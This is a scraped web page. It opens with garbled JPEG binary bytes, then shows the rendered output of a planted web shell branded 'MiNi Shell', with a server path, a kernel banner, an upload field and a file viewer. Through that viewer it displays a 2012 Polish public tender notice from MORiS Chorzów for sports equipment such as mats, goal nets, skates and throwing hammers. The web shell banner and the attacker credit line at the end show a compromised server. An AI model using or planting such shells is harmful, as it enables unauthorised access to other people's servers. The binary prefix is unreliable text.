JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120123/20808-N-2012.html

<p class="kh_header"><b>Chorzów: Zakup sprzętu sportowego na obiekty MORiS w Chorzowie</b><br>
<b>Numer ogłoszenia: 20808 - 2012; data zamieszczenia: 23.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Rekreacji i Sportu , ul. Dąbrowskiego 113, 41-500 Chorzów, woj. śląskie, tel. 032 2417050, 2411313, faks 032 2417055.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu sportowego na obiekty MORiS w Chorzowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - materace 2/1/01		20 szt.
Materac gimnastyczny o wym. 200x100x10cm, wkład z pianki T25kg/m3, pokrowiec tkanina pcv odporna na rozerwanie, spód antypoślizgowy, narożniki wzmacniane, uchwyty do przenoszenia. 

- materace do  judo   1x2   60 szt.;    1x1  1 szt.
Bez certyfikatów 

- deski do  nauki  pływania duże   20 szt. 
Deska o wymiarach 470x285x38mm
Laminowana deska w kolorze niebieskim. Efekt młotkowy, wykonana z polietylenu, z zaokrąglonymi narożnikami dla bezpieczeństwa.

- deski do  nauki  pływania małe   20 szt.  
Deska o wymiarach 345x215x30mm
Laminowana deska w kolorach niebieskim. Efekt młotkowy, wykonana z polietylenu, z zaokrąglonymi narożnikami dla bezpieczeństwa.

- bramki przenośne        2 szt. (1kpl.)
Bramka do piłki nożnej przenośna senior aluminiowa o wymiarach 7,32x2,44m z siatkami  grubość sznurka min. 4mm

- drabinka gimnastyczna       1 szt. 
standardowa o  wym. 3m x 0,9m

- piłkochwyty 60x4m           2 szt. (1kpl.)
oczka maksymalnie 5x5cm polipropylen bezwęzłowy o grubość  4mm.,  kolor zielony
wraz z elementami montażowymi (lina stalowa karabińczyki, śruby, zaciski)

- piłkochwyty 20x4m      8 szt. (4 kpl.) 
oczka maksymalnie 5x5cm polipropylen bezwęzłowy o grubość  4mm.,  kolor zielony
wraz z elementami montażowymi (lina stalowa karabińczyki, śruby, zaciski)

- zeskok do skoku wzwyż - kołderka gąbkowa + pokrowiec 
zeskok składa się z trzech materacy o wymiarach 3x2x0.40m więc pokrowiec i kołderka winna mieć wymiary 3mx6m

- rakiety do tenisa    2 szt.
Zwykłe - nie profesjonalne 

- piłki do tenisa  21 szt.
Zwykłe - nie profesjonalne, na kort ceglasty 

- przymiar teleskopowy do skoku o tyczce    1 szt.
aluminiowy, pomiar do 8 m, 6 segmentów, wykonany z profili aluminiowych, wyposażony w poziomnicę, zakres do 8 m.

- poprzeczki do skoku o tyczce     3 szt.
wyczynowa 4,5 m, IAAF Certyfikat, wykonana z włókna szklanego, końcówki wykonane z tworzywa sztucznego

- poprzeczki do skoku wzwyż    3 szt.
wyczynowa, 4 m, IAAF nr E-08-0520, wykonana z włókna szklanego, końcówki wykonane z tworzywa sztucznego

- listwy do płotków treningowych   15 szt.

- elementy łączące poprzeczki z płotkiem (plastikowe 25 szt., zatyczki 100 szt.)

- taśmy pomiarowe stalowe
100m -2 szt., 20m -2szt., 10m -2szt. 

- taśmy do wyznaczania pola rzutu młot-dysk- oszczep (parciane) 200 m 
kolory biały, szer. 50 mm, w odcinka dł. 25 m, tkanina syntetyczna, 15 klamerek do mocowania w zestawie

- kule 3kg     3 szt.  
stalowa wyczynowa 3 kg, śr. 100 mm, toczona na całej powierzchni, wypełniona odpowiednią mieszanką śrutu ołowiowego i stalowego, malowana lakierem proszkowym

- kule 4kg         3 szt. 
stalowa  wyczynowa 4 kg, śr. 100 mm, Certyfikat, toczona na całej powierzchni, wypełniona odpowiednią mieszanką śrutu ołowiowego i stalowego, malowana lakierem proszkowym

- kule 5kg         1 szt. 
stalowa  wyczynowa 5 kg, śr. 100 mm, Certyfikat, toczona na całej powierzchni, wypełniona odpowiednią mieszanką śrutu ołowiowego i stalowego, malowana lakierem proszkowym

- młoty 3 kg, treningowy, stalowy    1 szt.  + linki 3 szt. bez uchwytów 

- młoty 4kg, wyczynowy, stalowy posiadający Certyfikat IAAF       3 szt.  + linki 3 szt.

- młoty 5kg, wyczynowy, stalowy posiadający Certyfikat IAAF       2 szt.  + linki 3 szt.

- młoty 6kg, wyczynowy, stalowy posiadający Certyfikat IAAF       1 szt.  + linki 3 szt.

- młoty 7,26kg, wyczynowy, stalowy posiadający Certyfikat IAAF  2 szt.  + linki 3 szt.

- łyżwy damskie figurowe (skóra syntetyczna)            41  par
rozm. 28  - 4 szt. 
rozm. 29  - 4 szt. 
rozm. 30  - 4 szt. 
rozm. 33  - 4 szt. 
rozm. 34  - 4 szt. 
rozm. 37  - 6 szt. 
rozm. 38  - 7 szt. 
rozm. 39  - 5 szt. 
rozm. 41  - 3 szt. 

- łyżwy męskie hokejowe (parciane, wiązane)             59 par
rozm. 37  -  5 szt. 
rozm. 38  -  8 szt. 
rozm. 39  -  7 szt. 
rozm. 40  -  5 szt. 
rozm. 41  -  6 szt. 
rozm. 42  - 10 szt. 
rozm. 43  - 10 szt. 
rozm. 44  -   7 szt. 
rozm. 49  -   1 szt. 

- siatki do piłki ręcznej 3/2  gł. g 0,9  d 1,5    kolor niebieski      1 kpl. 
Grubość siatki min 4mm, bezwęzłowa  
 
- siatki na bramki 5/2  gł. g 0,9  d 1,2    kolor niebieski         5 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 7,2 / 2,4  gł. g 2  d 2   kolor biały       2 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 7,2 / 2,4  gł. g 2  d 2   (niebiesko-białe)    2 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 3/2  gł. g 0,9  d 1,5    kolor zielony      1 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 7,2 / 2,4  gł. g 2  d 2   kolor biały     1 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 3/2  gł. g 0,9  d 1,5    kolor zielony     8 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki na bramki 3/2  gł. g 1  d 1    kolor zielony       8 kpl.
Grubość siatki min 4mm, bezwęzłowa  

- siatki do  bramek dużych   7,2 / 2,4  gł.  g 2   d 2    kolor biały    2 kpl. 
Grubość siatki min 4mm, bezwęzłowa  

- siatka do siatkówki     1 szt.
Czarna turniejowa z antenkami

- siatki do piłkochwytów        2 szt.  
Wymiar 66m/6m, oczka maksymalnie 5x5cm polipropylen bezwęzłowy o grubość  4mm.,  kolor zielony wraz z elementami montażowymi (lina stalowa karabińczyki, śruby, zaciski)

- siatki do koszykówki z łańcucha      2 szt.

- siatka osłonowa na rzutnię treningową - kolor zielony             1 szt. 
Siatka osłonowa 4-5mm, Oczko 4x4 do 5x5cm, Elementy montażowe: śruby, przelotki itp.- 10kpl., zał. nr 8 rysunek rzutni, Ilość słupów 6 szt. po 10m; 6szt. po 7m
- lina basenowa torowa kompletna dł. 25 m                    5kpl.

- mankiety na nogi i ręce do aqua aerobiku                    30kpl.

- ciężarki-opaski na nogi 1kg                                          60 szt.

- gumy do ćwiczeń czerwone                                           15mb

- poduszki sensomotoryczne                                            25 szt.

Do oferty należy dostarczyć certyfikaty (tam gdzie są wymagane) oraz karty katalogowe proponowanego sprzętu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy dostaw, zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.40.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania 
b)  posiadają niezbędną wiedzę i doświadczenie 
c) dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania   zamówienia 
d)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w zakresie posiadania niezbędnej wiedzy i doświadczenia wymagane jest:
- Wykonawcy przedstawią wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te dostawy zostały wykonane należycie.
Za zadanie odpowiadające rodzajem i wartością zamówienia Zamawiający uzna wykonanie następujących dostaw: dostawę sprzętu sportowego za kwotę nie mniejszą niż 100.000,00 zł. brutto każda (2 szt.)  podanej zgodnie  z art.32 ust.1 PZP, załącznik nr 5 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dostarczyć certyfikaty (tam gdzie są wymagane) oraz karty katalogowe proponowanego sprzętu.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć wszelkie niezbędne oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu.

Oświadczenia i wykazy składa się wyłącznie w oryginale.
Pozostałe dokumenty składa się w oryginale lub w kopii z poświadczeniem Wykonawcy o zgodności kopii z oryginałem.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku korzystania z zasobów innych podmiotów kopie dokumentów dotyczących Wykonawcy lub tych podmiotów mogą być poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty.
Dokumenty obcojęzyczne należy złożyć z tłumaczeniem na język polski dokonanym lub poświadczonym przez Wykonawcę.

Zaleca się składanie dokumentów w porządku wymienionym w punkcie 5, 6 i 10 siwz. 

Zaleca się ponumerowanie stron.
Jeśli ofertę podpisała osoba nie występująca w wypisie z KRS, zaświadczeniu o wpisie do ewidencji działalności gospodarczej, albo w innym dokumencie potwierdzającym uprawnienia do prowadzenia działalności gospodarczej i potwierdzającym uprawnienia do reprezentacji, do oferty należy dołączyć pełnomocnictwo do podpisania oferty w oryginale bądź kopii potwierdzonej notarialnie.
Wykonawcy składający wspólną ofertę, którzy ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, dołączą do oferty stosowne pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie.
Wykonawcy występujący wspólnie podpisują ofertę zgodnie z pełnomocnictwem dołączonym do oferty, ponosząc solidarną odpowiedzialność za wykonanie zamówienia.
W przypadku ofert wspólnych przed podpisaniem umowy Wykonawcy muszą dostarczyć:
- konsorcja: umowę konsorcjum, określającą sposób współdziałania, zakres prac przewidzianych do wykonania dla każdego z członków konsorcjum przy realizacji zamówienia, sposób rozliczania się w przypadku wygrania przetargu, czas trwania oraz sposób rozwiązania
- spółki cywilne: kopię umowy spółki cywilnej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)  Umowa zostanie sporządzona w oparciu o istotne warunki umowy - załącznik nr 7, stanowiący integralną część niniejszej siwz.
2) Zamawiający - na podstawie art. 144 ust. 1 ustawy  Pzp - zastrzega sobie prawo do zmiany treści umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy w sprawie zamówienia publicznego, albo zmiany te są korzystne dla Zamawiającego. 
3) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.
4) Dopuszczalny zakres zmian umowy w sprawie zamówienia publicznego obejmuje: 
- możliwość przedłużenia terminu wykonania zamówienia i innych terminów umownych; 
- możliwość zmiany miejsca dostawy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.moris.chorzow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MORiS Chorzów, ul. Dąbrowskiego 113, 41-500 Chorzów pok.335, koszt SIWZ 15 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 09:00, miejsce: MORiS Chorzów, ul. Dąbrowskiego 113, 41-500 Chorzów pok.335.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com